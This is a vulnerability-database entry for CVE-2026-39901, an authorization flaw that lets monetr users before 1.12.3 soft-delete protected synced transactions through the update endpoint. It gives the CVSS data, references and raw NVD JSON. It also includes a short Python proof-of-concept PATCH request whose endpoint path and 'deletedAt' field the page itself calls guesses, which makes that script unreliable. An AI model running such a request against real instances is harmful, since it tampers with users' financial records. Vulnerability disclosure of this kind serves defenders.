CVE-2026-39901

Description

monetr is a budgeting application focused on planning for recurring expenses. Prior to 1.12.3, a transaction integrity flaw allows an authenticated tenant user to soft-delete synced non-manual transactions through the transaction update endpoint, despite the application explicitly blocking deletion of those transactions via the normal DELETE path. This bypass undermines the intended protection for imported transaction records and allows protected transactions to be hidden from normal views. This vulnerability is fixed in 1.12.3.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

monetr < 1.12.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target API endpoint for updating a transaction
# The specific endpoint path is inferred based on the description
url = "https://target-monetr-instance/api/transactions/{transaction_id}"

# Headers (Assuming authentication is required via Bearer token)
headers = {
    "Authorization": "Bearer <VALID_TOKEN>",
    "Content-Type": "application/json"
}

# Payload attempting to soft-delete a protected synced transaction
# The specific field name 'deletedAt' is a hypothesis based on common soft-delete patterns
payload = {
    "deletedAt": "2026-01-01T00:00:00Z"
}

response = requests.patch(url, json=payload, headers=headers)

if response.status_code == 200:
    print("PoC Success: Transaction likely soft-deleted.")
else:
    print(f"PoC Failed: Status code {response.status_code}, Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39901
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39901
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39901/
[4] VulDB https://vuldb.com/cve/CVE-2026-39901
[5] https://github.com/monetr/monetr/security/advisories/GHSA-hqxq-hwqf-wg83

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39901", "sourceIdentifier": "[email protected]", "published": "2026-04-08T22:16:22.010", "lastModified": "2026-04-16T14:57:08.337", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "monetr is a budgeting application focused on planning for recurring expenses. Prior to 1.12.3, a transaction integrity flaw allows an authenticated tenant user to soft-delete synced non-manual transactions through the transaction update endpoint, despite the application explicitly blocking deletion of those transactions via the normal DELETE path. This bypass undermines the intended protection for imported transaction records and allows protected transactions to be hidden from normal views. This vulnerability is fixed in 1.12.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/monetr/monetr/security/advisories/GHSA-hqxq-hwqf-wg83", "source": "[email protected]"}]}}